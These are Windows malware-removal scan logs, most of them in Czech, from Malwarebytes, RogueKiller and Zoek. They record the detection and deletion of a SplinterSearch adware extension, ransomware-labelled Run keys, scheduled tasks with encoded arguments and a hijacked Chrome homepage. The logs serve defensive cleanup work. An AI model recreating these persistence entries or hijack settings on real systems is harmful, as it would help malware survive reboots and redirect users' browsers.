O23 - Service: Služba Google Update (gupdatem) (gupdatem) - Google Inc. - C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
O23 - Service: Intel(R) Capability Licensing Service TCP IP Interface - Intel(R) Corporation - C:\Program Files\Intel\iCLS Client\SocketHeciServer.exe
O23 - Service: Intel(R) Security Assist Helper (isaHelperSvc) - Unknown owner - C:\Program Files (x86)\Intel\Intel(R) Security Assist\isaHelperService.exe
O23 - Service: Intel(R) Dynamic Application Loader Host Interface Service (jhi_service) - Intel Corporation - C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\DAL\jhi_service.exe
O23 - Service: @keyiso.dll,-100 (KeyIso) - Unknown owner - C:\WINDOWS\system32\lsass.exe (file missing)
O23 - Service: LMIGuardianSvc - LogMeIn, Inc. - C:\Program Files (x86)\LogMeIn Hamachi\LMIGuardianSvc.exe
O23 - Service: Malwarebytes Service (MBAMService) - Malwarebytes - C:\Program Files\Malwarebytes\Anti-Malware\mbamservice.exe
O23 - Service: @comres.dll,-2797 (MSDTC) - Unknown owner - C:\WINDOWS\System32\msdtc.exe (file missing)
O23 - Service: @%SystemRoot%\System32\netlogon.dll,-102 (Netlogon) - Unknown owner - C:\WINDOWS\system32\lsass.exe (file missing)
O23 - Service: nProtect GameGuard Service (npggsvc) - Unknown owner - C:\WINDOWS\system32\GameMon.des.exe (file missing)
O23 - Service: NVIDIA LocalSystem Container (NvContainerLocalSystem) - NVIDIA Corporation - C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe
O23 - Service: NVIDIA NetworkService Container (NvContainerNetworkService) - NVIDIA Corporation - C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe
O23 - Service: NVIDIA Display Container LS (NVDisplay.ContainerLocalSystem) - NVIDIA Corporation - C:\Program Files\NVIDIA Corporation\Display.NvContainer\NVDisplay.Container.exe
O23 - Service: NVIDIA Wireless Controller Service - Unknown owner - C:\Program Files\NVIDIA Corporation\GeForce Experience Service\nvwirelesscontroller.exe (file missing)
O23 - Service: NVIDIA Telemetry Container (NvTelemetryContainer) - NVIDIA Corporation - C:\Program Files (x86)\NVIDIA Corporation\NvTelemetry\NvTelemetryContainer.exe
O23 - Service: O&O Defrag (OODefragAgent) - O&O Software GmbH - C:\Program Files\OO Software\Defrag\oodag.exe
O23 - Service: Overwolf Updater Windows SCM (OverwolfUpdater) - Unknown owner - C:\Program Files (x86)\Overwolf\OverwolfUpdater.exe (file missing)
O23 - Service: @%systemroot%\system32\Locator.exe,-2 (RpcLocator) - Unknown owner - C:\WINDOWS\system32\locator.exe (file missing)
O23 - Service: @%SystemRoot%\system32\samsrv.dll,-1 (SamSs) - Unknown owner - C:\WINDOWS\system32\lsass.exe (file missing)
O23 - Service: Spybot-S&D 2 Scanner Service (SDScannerService) - Safer-Networking Ltd. - C:\Program Files (x86)\Spybot - Search & Destroy 2\SDFSSvc.exe
O23 - Service: Spybot-S&D 2 Updating Service (SDUpdateService) - Safer-Networking Ltd. - C:\Program Files (x86)\Spybot - Search & Destroy 2\SDUpdSvc.exe
O23 - Service: Spybot-S&D 2 Security Center Service (SDWSCService) - Safer-Networking Ltd. - C:\Program Files (x86)\Spybot - Search & Destroy 2\SDWSCSvc.exe
O23 - Service: @%SystemRoot%\system32\SensorDataService.exe,-101 (SensorDataService) - Unknown owner - C:\WINDOWS\System32\SensorDataService.exe (file missing)
O23 - Service: Skype Updater (SkypeUpdate) - Skype Technologies - C:\Program Files (x86)\Skype\Updater\Updater.exe
O23 - Service: @%SystemRoot%\system32\snmptrap.exe,-3 (SNMPTRAP) - Unknown owner - C:\WINDOWS\System32\snmptrap.exe (file missing)
O23 - Service: @%systemroot%\system32\spoolsv.exe,-1 (Spooler) - Unknown owner - C:\WINDOWS\System32\spoolsv.exe (file missing)
O23 - Service: @%SystemRoot%\system32\sppsvc.exe,-101 (sppsvc) - Unknown owner - C:\WINDOWS\system32\sppsvc.exe (file missing)
O23 - Service: Steam Client Service - Valve Corporation - C:\Program Files (x86)\Common Files\Steam\SteamService.exe
O23 - Service: @%SystemRoot%\system32\TieringEngineService.exe,-702 (TieringEngineService) - Unknown owner - C:\WINDOWS\system32\TieringEngineService.exe (file missing)
O23 - Service: @%SystemRoot%\system32\ui0detect.exe,-101 (UI0Detect) - Unknown owner - C:\WINDOWS\system32\UI0Detect.exe (file missing)
O23 - Service: @%SystemRoot%\system32\vaultsvc.dll,-1003 (VaultSvc) - Unknown owner - C:\WINDOWS\system32\lsass.exe (file missing)
O23 - Service: @%SystemRoot%\system32\vds.exe,-100 (vds) - Unknown owner - C:\WINDOWS\System32\vds.exe (file missing)
O23 - Service: @%systemroot%\system32\vssvc.exe,-102 (VSS) - Unknown owner - C:\WINDOWS\system32\vssvc.exe (file missing)
O23 - Service: @%systemroot%\system32\wbengine.exe,-104 (wbengine) - Unknown owner - C:\WINDOWS\system32\wbengine.exe (file missing)
O23 - Service: @%ProgramFiles%\Windows Defender\MpAsDesc.dll,-320 (WdNisSvc) - Unknown owner - C:\Program Files (x86)\Windows Defender\NisSrv.exe (file missing)
O23 - Service: @%ProgramFiles%\Windows Defender\MpAsDesc.dll,-310 (WinDefend) - Unknown owner - C:\Program Files (x86)\Windows Defender\MsMpEng.exe (file missing)
O23 - Service: @%Systemroot%\system32\wbem\wmiapsrv.exe,-110 (wmiApSrv) - Unknown owner - C:\WINDOWS\system32\wbem\WmiApSrv.exe (file missing)
O23 - Service: @%PROGRAMFILES%\Windows Media Player\wmpnetwk.exe,-101 (WMPNetworkSvc) - Unknown owner - C:\Program Files (x86)\Windows Media Player\wmpnetwk.exe (file missing)
--
End of file - 11925 bytes
Malwarebytes
www.malwarebytes.com
-Podrobnosti logovacího souboru-
Datum skenování: 15.03.17
Čas skenování: 21:23
Logovací soubor: mwanm.txt
Správce: Ano
-Informace o softwaru-
Verze: 3.0.6.1469
Verze komponentů: 1.0.75
Aktualizovat verzi balíku komponent: 1.0.1510
Licence: Zkušební
-Systémová informace-
OS: Windows 10
CPU: x64
Systém souborů: NTFS
Uživatel: DESKTOP-S3S217H\Nekut
-Shrnutí skenování-
Typ skenování: Skenování hrozeb (Threat Scan)
Výsledek: Dokončeno
Skenované objekty: 433429
Uplynulý čas: 10 min, 35 sek
-Možnosti skenování-
Paměť: Povoleno
Start: Povoleno
Systém souborů: Povoleno
Archivy: Povoleno
Rootkity: Povoleno
Heuristika: Povoleno
Potenciálně nežádoucí program: Povoleno
Potenciálně nežádoucí modifikace: Povoleno
-Podrobnosti skenování-
Proces: 0
(Nebyly zjištěny žádné škodlivé položky)
Modul: 0
(Nebyly zjištěny žádné škodlivé položky)
Klíč registru: 0
(Nebyly zjištěny žádné škodlivé položky)
Hodnota v registru: 0
(Nebyly zjištěny žádné škodlivé položky)
Data registrů: 0
(Nebyly zjištěny žádné škodlivé položky)
Datové proudy: 0
(Nebyly zjištěny žádné škodlivé položky)
Adresář: 9
PUP.Optional.SplinterSearch, C:\Users\Nekut\AppData\Local\Google\Chrome\User Data\Default\Extensions\fnhfdmnphmbbjbgppnpcddkefmeokfho\0.5.5_0\content\webfonts, Žádná uživatelská akce, [3239], [360481],1.0.1510
PUP.Optional.SplinterSearch, C:\Users\Nekut\AppData\Local\Google\Chrome\User Data\Default\Extensions\fnhfdmnphmbbjbgppnpcddkefmeokfho\0.5.5_0\scripts\external, Žádná uživatelská akce, [3239], [360481],1.0.1510
PUP.Optional.SplinterSearch, C:\Users\Nekut\AppData\Local\Google\Chrome\User Data\Default\Extensions\fnhfdmnphmbbjbgppnpcddkefmeokfho\0.5.5_0\_metadata, Žádná uživatelská akce, [3239], [360481],1.0.1510
PUP.Optional.SplinterSearch, C:\Users\Nekut\AppData\Local\Google\Chrome\User Data\Default\Extensions\fnhfdmnphmbbjbgppnpcddkefmeokfho\0.5.5_0\content, Žádná uživatelská akce, [3239], [360481],1.0.1510
PUP.Optional.SplinterSearch, C:\Users\Nekut\AppData\Local\Google\Chrome\User Data\Default\Extensions\fnhfdmnphmbbjbgppnpcddkefmeokfho\0.5.5_0\scripts, Žádná uživatelská akce, [3239], [360481],1.0.1510
PUP.Optional.SplinterSearch, C:\Users\Nekut\AppData\Local\Google\Chrome\User Data\Default\Extensions\fnhfdmnphmbbjbgppnpcddkefmeokfho\0.5.5_0\images, Žádná uživatelská akce, [3239], [360481],1.0.1510
PUP.Optional.SplinterSearch, C:\Users\Nekut\AppData\Local\Google\Chrome\User Data\Default\Extensions\fnhfdmnphmbbjbgppnpcddkefmeokfho\0.5.5_0\icons, Žádná uživatelská akce, [3239], [360481],1.0.1510
PUP.Optional.SplinterSearch, C:\Users\Nekut\AppData\Local\Google\Chrome\User Data\Default\Extensions\fnhfdmnphmbbjbgppnpcddkefmeokfho\0.5.5_0, Žádná uživatelská akce, [3239], [360481],1.0.1510
PUP.Optional.SplinterSearch, C:\USERS\NEKUT\APPDATA\LOCAL\GOOGLE\CHROME\USER DATA\Default\EXTENSIONS\fnhfdmnphmbbjbgppnpcddkefmeokfho, Žádná uživatelská akce, [3239], [360481],1.0.1510
Soubor: 30
PUP.Optional.SplinterSearch, C:\Users\Nekut\AppData\Local\Google\Chrome\User Data\Default\Extensions\fnhfdmnphmbbjbgppnpcddkefmeokfho\0.5.5_0\content\webfonts\anfinity.eot, Žádná uživatelská akce, [3239], [360481],1.0.1510
PUP.Optional.SplinterSearch, C:\Users\Nekut\AppData\Local\Google\Chrome\User Data\Default\Extensions\fnhfdmnphmbbjbgppnpcddkefmeokfho\0.5.5_0\content\webfonts\anfinity.ttf, Žádná uživatelská akce, [3239], [360481],1.0.1510
PUP.Optional.SplinterSearch, C:\Users\Nekut\AppData\Local\Google\Chrome\User Data\Default\Extensions\fnhfdmnphmbbjbgppnpcddkefmeokfho\0.5.5_0\content\webfonts\anfinity.woff, Žádná uživatelská akce, [3239], [360481],1.0.1510
PUP.Optional.SplinterSearch, C:\Users\Nekut\AppData\Local\Google\Chrome\User Data\Default\Extensions\fnhfdmnphmbbjbgppnpcddkefmeokfho\0.5.5_0\content\fonts.css, Žádná uživatelská akce, [3239], [360481],1.0.1510
PUP.Optional.SplinterSearch, C:\Users\Nekut\AppData\Local\Google\Chrome\User Data\Default\Extensions\fnhfdmnphmbbjbgppnpcddkefmeokfho\0.5.5_0\content\jquery-ui.css, Žádná uživatelská akce, [3239], [360481],1.0.1510
PUP.Optional.SplinterSearch, C:\Users\Nekut\AppData\Local\Google\Chrome\User Data\Default\Extensions\fnhfdmnphmbbjbgppnpcddkefmeokfho\0.5.5_0\content\site.css, Žádná uživatelská akce, [3239], [360481],1.0.1510
PUP.Optional.SplinterSearch, C:\Users\Nekut\AppData\Local\Google\Chrome\User Data\Default\Extensions\fnhfdmnphmbbjbgppnpcddkefmeokfho\0.5.5_0\content\weather.css, Žádná uživatelská akce, [3239], [360481],1.0.1510
PUP.Optional.SplinterSearch, C:\Users\Nekut\AppData\Local\Google\Chrome\User Data\Default\Extensions\fnhfdmnphmbbjbgppnpcddkefmeokfho\0.5.5_0\icons\128x128.png, Žádná uživatelská akce, [3239], [360481],1.0.1510
PUP.Optional.SplinterSearch, C:\Users\Nekut\AppData\Local\Google\Chrome\User Data\Default\Extensions\fnhfdmnphmbbjbgppnpcddkefmeokfho\0.5.5_0\icons\16x16.png, Žádná uživatelská akce, [3239], [360481],1.0.1510
PUP.Optional.SplinterSearch, C:\Users\Nekut\AppData\Local\Google\Chrome\User Data\Default\Extensions\fnhfdmnphmbbjbgppnpcddkefmeokfho\0.5.5_0\icons\19x19.png, Žádná uživatelská akce, [3239], [360481],1.0.1510
PUP.Optional.SplinterSearch, C:\Users\Nekut\AppData\Local\Google\Chrome\User Data\Default\Extensions\fnhfdmnphmbbjbgppnpcddkefmeokfho\0.5.5_0\icons\38x38.png, Žádná uživatelská akce, [3239], [360481],1.0.1510
PUP.Optional.SplinterSearch, C:\Users\Nekut\AppData\Local\Google\Chrome\User Data\Default\Extensions\fnhfdmnphmbbjbgppnpcddkefmeokfho\0.5.5_0\icons\favicon.ico, Žádná uživatelská akce, [3239], [360481],1.0.1510
PUP.Optional.SplinterSearch, C:\Users\Nekut\AppData\Local\Google\Chrome\User Data\Default\Extensions\fnhfdmnphmbbjbgppnpcddkefmeokfho\0.5.5_0\icons\pop.png, Žádná uživatelská akce, [3239], [360481],1.0.1510
PUP.Optional.SplinterSearch, C:\Users\Nekut\AppData\Local\Google\Chrome\User Data\Default\Extensions\fnhfdmnphmbbjbgppnpcddkefmeokfho\0.5.5_0\images\ic_refresh_black_24dp_2x.png, Žádná uživatelská akce, [3239], [360481],1.0.1510
PUP.Optional.SplinterSearch, C:\Users\Nekut\AppData\Local\Google\Chrome\User Data\Default\Extensions\fnhfdmnphmbbjbgppnpcddkefmeokfho\0.5.5_0\images\ic_search_black_24dp_2x.png, Žádná uživatelská akce, [3239], [360481],1.0.1510
PUP.Optional.SplinterSearch, C:\Users\Nekut\AppData\Local\Google\Chrome\User Data\Default\Extensions\fnhfdmnphmbbjbgppnpcddkefmeokfho\0.5.5_0\images\logo.png, Žádná uživatelská akce, [3239], [360481],1.0.1510
PUP.Optional.SplinterSearch, C:\Users\Nekut\AppData\Local\Google\Chrome\User Data\Default\Extensions\fnhfdmnphmbbjbgppnpcddkefmeokfho\0.5.5_0\images\m1-min.jpg, Žádná uživatelská akce, [3239], [360481],1.0.1510
PUP.Optional.SplinterSearch, C:\Users\Nekut\AppData\Local\Google\Chrome\User Data\Default\Extensions\fnhfdmnphmbbjbgppnpcddkefmeokfho\0.5.5_0\scripts\external\bootstrap.min.js, Žádná uživatelská akce, [3239], [360481],1.0.1510
PUP.Optional.SplinterSearch, C:\Users\Nekut\AppData\Local\Google\Chrome\User Data\Default\Extensions\fnhfdmnphmbbjbgppnpcddkefmeokfho\0.5.5_0\scripts\external\jquery-ui.js, Žádná uživatelská akce, [3239], [360481],1.0.1510
PUP.Optional.SplinterSearch, C:\Users\Nekut\AppData\Local\Google\Chrome\User Data\Default\Extensions\fnhfdmnphmbbjbgppnpcddkefmeokfho\0.5.5_0\scripts\external\jquery.min.js, Žádná uživatelská akce, [3239], [360481],1.0.1510
PUP.Optional.SplinterSearch, C:\Users\Nekut\AppData\Local\Google\Chrome\User Data\Default\Extensions\fnhfdmnphmbbjbgppnpcddkefmeokfho\0.5.5_0\scripts\external\jquery.simpleWeather.min.js, Žádná uživatelská akce, [3239], [360481],1.0.1510
PUP.Optional.SplinterSearch, C:\Users\Nekut\AppData\Local\Google\Chrome\User Data\Default\Extensions\fnhfdmnphmbbjbgppnpcddkefmeokfho\0.5.5_0\scripts\external\list.min.js, Žádná uživatelská akce, [3239], [360481],1.0.1510
PUP.Optional.SplinterSearch, C:\Users\Nekut\AppData\Local\Google\Chrome\User Data\Default\Extensions\fnhfdmnphmbbjbgppnpcddkefmeokfho\0.5.5_0\scripts\external\weather.js, Žádná uživatelská akce, [3239], [360481],1.0.1510
PUP.Optional.SplinterSearch, C:\Users\Nekut\AppData\Local\Google\Chrome\User Data\Default\Extensions\fnhfdmnphmbbjbgppnpcddkefmeokfho\0.5.5_0\scripts\background.js, Žádná uživatelská akce, [3239], [360481],1.0.1510
PUP.Optional.SplinterSearch, C:\Users\Nekut\AppData\Local\Google\Chrome\User Data\Default\Extensions\fnhfdmnphmbbjbgppnpcddkefmeokfho\0.5.5_0\scripts\site.js, Žádná uživatelská akce, [3239], [360481],1.0.1510
PUP.Optional.SplinterSearch, C:\Users\Nekut\AppData\Local\Google\Chrome\User Data\Default\Extensions\fnhfdmnphmbbjbgppnpcddkefmeokfho\0.5.5_0\_metadata\computed_hashes.json, Žádná uživatelská akce, [3239], [360481],1.0.1510
PUP.Optional.SplinterSearch, C:\Users\Nekut\AppData\Local\Google\Chrome\User Data\Default\Extensions\fnhfdmnphmbbjbgppnpcddkefmeokfho\0.5.5_0\_metadata\verified_contents.json, Žádná uživatelská akce, [3239], [360481],1.0.1510
PUP.Optional.SplinterSearch, C:\Users\Nekut\AppData\Local\Google\Chrome\User Data\Default\Extensions\fnhfdmnphmbbjbgppnpcddkefmeokfho\0.5.5_0\main.html, Žádná uživatelská akce, [3239], [360481],1.0.1510
PUP.Optional.SplinterSearch, C:\Users\Nekut\AppData\Local\Google\Chrome\User Data\Default\Extensions\fnhfdmnphmbbjbgppnpcddkefmeokfho\0.5.5_0\manifest.json, Žádná uživatelská akce, [3239], [360481],1.0.1510
PUP.Optional.MyRadioXP, C:\USERS\NEKUT\APPDATA\LOCAL\GOOGLE\CHROME\USER DATA\Default\LOCAL STORAGE\chrome-extension_fnhfdmnphmbbjbgppnpcddkefmeokfho_0.localstorage, Žádná uživatelská akce, [3243], [360496],1.0.1510
Fyzický sektor: 0
(Nebyly zjištěny žádné škodlivé položky)
(end)
RogueKiller V12.10.0.0 (x64) [Mar 13 2017] (Free) by Adlice Software
mail : http://www.adlice.com/contact/
Feedback : https://forum.adlice.com
Webová stránka : http://www.adlice.com/download/roguekiller/
Blog : http://www.adlice.com
Operační systém : Windows 10 (10.0.14393) 64 bits version
Spuštěno : Normální režim
Uživatel : Nekut [Práva správce]
Started from : C:\Users\Nekut\Downloads\RogueKillerX64.exe
Mód : Smazat -- Datum : 03/15/2017 20:26:18 (Duration : 00:24:48)
¤¤¤ Procesy : 0 ¤¤¤
¤¤¤ Registry : 11 ¤¤¤
[PUP.Gen0] (X64) HKEY_CLASSES_ROOT\CLSID\{5EC7C511-CD0F-42E6-830C-1BD9882F3458} -> Smazáno
[PUP.Gen0] (X64) HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{95B7759C-8C7F-4BF1-B163-73684A933233} -> Smazáno
[Suspicious.Path] (X86) HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run | D3B96F : %APPDATA%\D3B96F\FC440D.exe [x] -> Smazáno
[Suspicious.Path] (X64) HKEY_USERS\S-1-5-21-2417313614-488722605-2671369154-1001\Software\Microsoft\Windows\CurrentVersion\Run | D3B96F : %APPDATA%\D3B96F\FC440D.exe [x] -> Smazáno
[Suspicious.Path|VT.Ransom:Win32/Enestedel.B!rsm] (X64) HKEY_USERS\S-1-5-21-2417313614-488722605-2671369154-1001\Software\Microsoft\Windows\CurrentVersion\Run | Opwics : C:\Users\Nekut\AppData\Local\Opwics\nhspg.exe [-] -> Smazáno
[Suspicious.Path] (X64) HKEY_USERS\S-1-5-21-2417313614-488722605-2671369154-1001\Software\Microsoft\Windows\CurrentVersion\Run | Ibkjsoft : C:\Windows\SysWOW64\regsvr32.exe C:\Users\Nekut\AppData\Local\Opwics\bzcjicbl.dll [x] -> Smazáno
[Suspicious.Path] (X86) HKEY_USERS\S-1-5-21-2417313614-488722605-2671369154-1001\Software\Microsoft\Windows\CurrentVersion\Run | D3B96F : %APPDATA%\D3B96F\FC440D.exe [x] -> ERROR [2]
[Suspicious.Path|VT.Ransom:Win32/Enestedel.B!rsm] (X86) HKEY_USERS\S-1-5-21-2417313614-488722605-2671369154-1001\Software\Microsoft\Windows\CurrentVersion\Run | Opwics : C:\Users\Nekut\AppData\Local\Opwics\nhspg.exe [-] -> ERROR [2]
[Suspicious.Path] (X86) HKEY_USERS\S-1-5-21-2417313614-488722605-2671369154-1001\Software\Microsoft\Windows\CurrentVersion\Run | Ibkjsoft : C:\Windows\SysWOW64\regsvr32.exe C:\Users\Nekut\AppData\Local\Opwics\bzcjicbl.dll [x] -> ERROR [2]
[Suspicious.Path] (X64) HKEY_LOCAL_MACHINE\System\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules | TCP Query User{2745AA29-3952-43AA-B153-6B58BDAF514D}C:\users\nekut\appdata\local\temp\i1488367281\windows\resource\jre\bin\javaw.exe : v2.10|Action=Allow|Active=TRUE|Dir=In|Protocol=6|Profile=Private|Profile=Public|App=C:\users\nekut\appdata\local\temp\i1488367281\windows\resource\jre\bin\javaw.exe|Name=javaw|Desc=javaw|Defer=User| [x] -> Smazáno
[Suspicious.Path] (X64) HKEY_LOCAL_MACHINE\System\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules | UDP Query User{25CFBDAA-1221-403A-AB6F-ED4028F32280}C:\users\nekut\appdata\local\temp\i1488367281\windows\resource\jre\bin\javaw.exe : v2.10|Action=Allow|Active=TRUE|Dir=In|Protocol=17|Profile=Private|Profile=Public|App=C:\users\nekut\appdata\local\temp\i1488367281\windows\resource\jre\bin\javaw.exe|Name=javaw|Desc=javaw|Defer=User| [x] -> Smazáno
¤¤¤ Úlohy : 5 ¤¤¤
[Suspicious.Path] %WINDIR%\Tasks\GFQtQALtXtjqpHeY4.job -- C:\Users\Nekut\AppData\Roaming\GFQtQALtXtjqpHeY4.exe (--c=lQWCY15RgpZFB00ObxABi8I+ygOtw0YpTmoV3HxbWT6g6DMSUGGmW+15yIlrgZ0MiD4LaTXzLECweSX0ppaZOl0UQJA2bZ1vygPm/QVuwup4BfwFlujHinC77yxgFfK5PxeXtRUF4iFrLOW4mnlnzLujp5TmyLOABDT1bHu+KtdJIBZihMc1YAmscQsGPb/0Ak5JGl/yIE5FB5OCggbpevMUqwpKqapkS9rgYFfMj8zx4f0uznYjpeTjxgf4Z5fwMVyj6Chi4+9xn50yhTL7W4zZGVXlioEW66xJVNDafc6+96ifrXLrMFKdbzIyE92E4K96WxJzYJyOxxu7cHsHkQ==) -> Smazáno
[Suspicious.Path] %WINDIR%\Tasks\wHAbZSf.job -- C:\Users\Nekut\AppData\Roaming\wHAbZSf.exe (--c=NzeC9by4AKE9581pSnydjTpC4yQsXZg5dQgthwNgbL2NoA3oeqXDPEY7C4BlZWMaS9SBOzrqU65Us4sDo5zVnIYbkp72HxOyFSi6bo3INAXB4ohT7BpUFMgA4J9T3mEwjOdBa/XwkzIJ7aew9QpnSL91/3Pa4Ff56tDq2GwWbpvAgg37EE2DinYU0ptTP0CTgnstBA100tGRUqfTwSegJSnME+hoYRyB72uUDsSACCK3uC5CJPlw4tl70n9ztYigT2Emhcr1nZXDsixtpSnvQvJqtgDEKfhlB7DPHeT9B3bwGTtrbs7cE5Dd/qR/kbJLAOcym06GwpJmFx4SCqYEsg==) -> Smazáno
[Suspicious.Path] \GFQtQALtXtjqpHeY4 -- C:\Users\Nekut\AppData\Roaming\GFQtQALtXtjqpHeY4.exe (--c=lQWCY15RgpZFB00ObxABi8I+ygOtw0YpTmoV3HxbWT6g6DMSUGGmW+15yIlrgZ0MiD4LaTXzLECweSX0ppaZOl0UQJA2bZ1vygPm/QVuwup4BfwFlujHinC77yxgFfK5PxeXtRUF4iFrLOW4mnlnzLujp5TmyLOABDT1bHu+KtdJIBZihMc1YAmscQsGPb/0Ak5JGl/yIE5FB5OCggbpevMUqwpKqapkS9rgYFfMj8zx4f0uznYjpeTjxgf4Z5fwMVyj6Chi4+9xn50yhTL7W4zZGVXlioEW66xJVNDafc6+96ifrXLrMFKdbzIyE92E4K96WxJzYJyOxxu7cHsHkQ==) -> Smazáno
[Suspicious.Path] \ProgramDataUpdater -- "C:\windows\pdusvr.exe" -> Smazáno
[Suspicious.Path] \wHAbZSf -- C:\Users\Nekut\AppData\Roaming\wHAbZSf.exe (--c=NzeC9by4AKE9581pSnydjTpC4yQsXZg5dQgthwNgbL2NoA3oeqXDPEY7C4BlZWMaS9SBOzrqU65Us4sDo5zVnIYbkp72HxOyFSi6bo3INAXB4ohT7BpUFMgA4J9T3mEwjOdBa/XwkzIJ7aew9QpnSL91/3Pa4Ff56tDq2GwWbpvAgg37EE2DinYU0ptTP0CTgnstBA100tGRUqfTwSegJSnME+hoYRyB72uUDsSACCK3uC5CJPlw4tl70n9ztYigT2Emhcr1nZXDsixtpSnvQvJqtgDEKfhlB7DPHeT9B3bwGTtrbs7cE5Dd/qR/kbJLAOcym06GwpJmFx4SCqYEsg==) -> Smazáno
¤¤¤ Soubory : 5 ¤¤¤
[Adw.Cloudguard][Soubor] C:\Program Files (x86)\Overwolf\0.102.217.0\Microsoft.Win32.TaskScheduler.dll -> Smazáno
[Adw.Cloudguard][Soubor] C:\Program Files (x86)\Overwolf\0.103.32.0\Microsoft.Win32.TaskScheduler.dll -> Smazáno
[Adw.Cloudguard][Soubor] C:\Program Files (x86)\Overwolf\0.91.22.0\Microsoft.Win32.TaskScheduler.dll -> Smazáno
[Adw.Cloudguard][Soubor] C:\Program Files (x86)\Overwolf\0.99.9.0\Microsoft.Win32.TaskScheduler.dll -> Smazáno
[Adw.Cloudguard][Soubor] C:\Program Files (x86)\Overwolf\OverwolfUpdater.exe -> Smazáno
¤¤¤ WMI : 0 ¤¤¤
¤¤¤ Soubor HOSTS : 0 ¤¤¤
¤¤¤ Antirootkit : 0 (Driver: Nahrán) ¤¤¤
¤¤¤ Webové prohlížeče : 1 ¤¤¤
[PUM.HomePage][Chrome:Config] Default [SecurePrefs] : homepage [https://%66%65%65%64.%73%6E%61%70%64%6F.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGIjVkxlyIP4NYe17aVLWqICWRlg5p-TqszN326G3dy3mHYlJU_leL3IAiGvFzeaOhUIyCJcFE286UNTO4eZPO86PKEGCfrynUmXb3uq_pSnNua3I7BZYgy6kJMdsqTokNPy2WiG_-BWzOIW7ddYj86VlhSK030NLtwh40HfLYPFfyklC09xHt43i2BpT] -> Smazáno
¤¤¤ Kontrola MBR : ¤¤¤
+++++ PhysicalDrive0: ST1000DM003-1ER162 +++++
--- User ---
[MBR] 0086f36f0b7bc8b257f89fc226376c3d
[BSP] 9e3b3c473b1db0daa516427cdae6e1cc : Windows Vista/7/8 MBR Code
Partition table:
0 - [SYSTEM][MAN-MOUNT] Basic data partition | Offset (sectors): 2048 | Size: 450 MB
1 - [MAN-MOUNT] EFI system partition | Offset (sectors): 923648 | Size: 99 MB
2 - [MAN-MOUNT] Microsoft reserved partition | Offset (sectors): 1126400 | Size: 16 MB
3 - Basic data partition | Offset (sectors): 1159168 | Size: 199434 MB
4 - Basic data partition | Offset (sectors): 409600000 | Size: 753869 MB
User = LL1 ... OK
User = LL2 ... OK
Zoek.exe v5.0.0.1 Updated 27-09-2015
Tool run by Nekut on 15.03.2017 at 21:00:29,42.
Microsoft Windows 10 Home 10.0.14393 x64
Running in: Normal Mode No Internet Access Detected
Launched: C:\Users\Nekut\Downloads\zoek.exe [Scan all users] [Script inserted]
==== System Restore Info ======================
15.03.2017 21:01:08 Zoek.exe System Restore Point Created Successfully.
==== Reset Hosts File ======================
# Copyright (c) 1993-2006 Microsoft Corp.
#
# This is a sample HOSTS file used by Microsoft TCP/IP for Windows.
#
# This file contains the mappings of IP addresses to host names. Each
# entry should be kept on an individual line. The IP address should
# be placed in the first column followed by the corresponding host name.
# The IP address and the host name should be separated by at least one
# space.
#
# Additionally, comments (such as these) may be inserted on individual
# lines or following the machine name denoted by a '#' symbol.
#
# For example:
#
# 102.54.94.97 rhino.acme.com # source server
# 38.25.63.10 x.acme.com # x client host
127.0.0.1 localhost
==== Empty Folders Check ======================
C:\PROGRA~2\EaseUS deleted successfully
C:\PROGRA~2\GMT-MAX.ORG deleted successfully
C:\PROGRA~2\Paradox Interactive deleted successfully
C:\PROGRA~3\Comms deleted successfully
C:\PROGRA~3\iolo deleted successfully
C:\PROGRA~3\ProcessLasso deleted successfully
C:\PROGRA~3\SoftwareDistribution deleted successfully
C:\Users\Nekut\AppData\Local\Opera Software deleted successfully
C:\Users\Nekut\AppData\Local\Skype deleted successfully
C:\Users\Nekut\AppData\Local\Unity deleted successfully
C:\WINDOWS\serviceprofiles\networkservice\AppData\Local\CrashDumps deleted successfully
C:\WINDOWS\serviceprofiles\networkservice\AppData\Local\Maps deleted successfully
==== Deleting CLSID Registry Keys ======================
==== Deleting CLSID Registry Values ======================
==== Deleting Services ======================
==== Deleting Files \ Folders ======================
C:\PROGRA~2\EaseUS not found
C:\PROGRA~2\GMT-MAX.ORG not found
C:\PROGRA~2\Paradox Interactive not found
C:\Users\Nekut\.android deleted
C:\ArchiCAD.exe deleted
C:\PROGRA~3\Package Cache deleted
C:\Users\Nekut\AppData\LocalLow\Unity deleted
C:\windows\SysNative\GroupPolicy\Machine deleted
C:\windows\SysNative\GroupPolicy\User deleted
"C:\WINDOWS\Installer\6e9261ef.msi" deleted
"C:\Users\Nekut\AppData\Roaming\GFQtQALtXtjqpHeY4" deleted
"C:\Users\Nekut\AppData\Roaming\wHAbZSf" deleted
"C:\Users\Nekut\AppData\Roaming\{CEBA18AE-2A9A-6320-414B-A6E90A6F3D65}" deleted
"C:\Users\Nekut\AppData\Roaming\Tunngle\Local.key" deleted
"C:\Users\Nekut\AppData\Roaming\Tunngle\Local.pub" deleted
"C:\Users\Nekut\AppData\Roaming\iolo" deleted
"C:\Users\Nekut\AppData\Roaming\Tunngle" deleted
==== Chromium Look ======================
Google Chrome Version: 46.0.2490.86
HKEY_LOCAL_MACHINE\SOFTWARE\Google\Chrome\Extensions
efaidnbmnnnibpcajpcglclefindmkaj - No path found[]
lifbcibllhkdhoafpjfnlhfpfgnpldfl - No path found[]
internetquickaccess - Nekut\AppData\Local\Chromium\User Data\Default\Extensions\ddlhogjgfofpgmkognopimmilcldcepb
Chrome Media Router - Nekut\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm
==== Chromium Fix ======================
C:\Users\Nekut\AppData\Local\Google\Chrome\User Data\Default\Local Storage\https_www.stlyrics.com_0.localstorage deleted successfully
C:\Users\Nekut\AppData\Local\Google\Chrome\User Data\Default\Local Storage\https_www.stlyrics.com_0.localstorage-journal deleted successfully
C:\Users\Nekut\AppData\Local\Google\Chrome\User Data\Default\Local Storage\https_c.betrad.com_0.localstorage deleted successfully
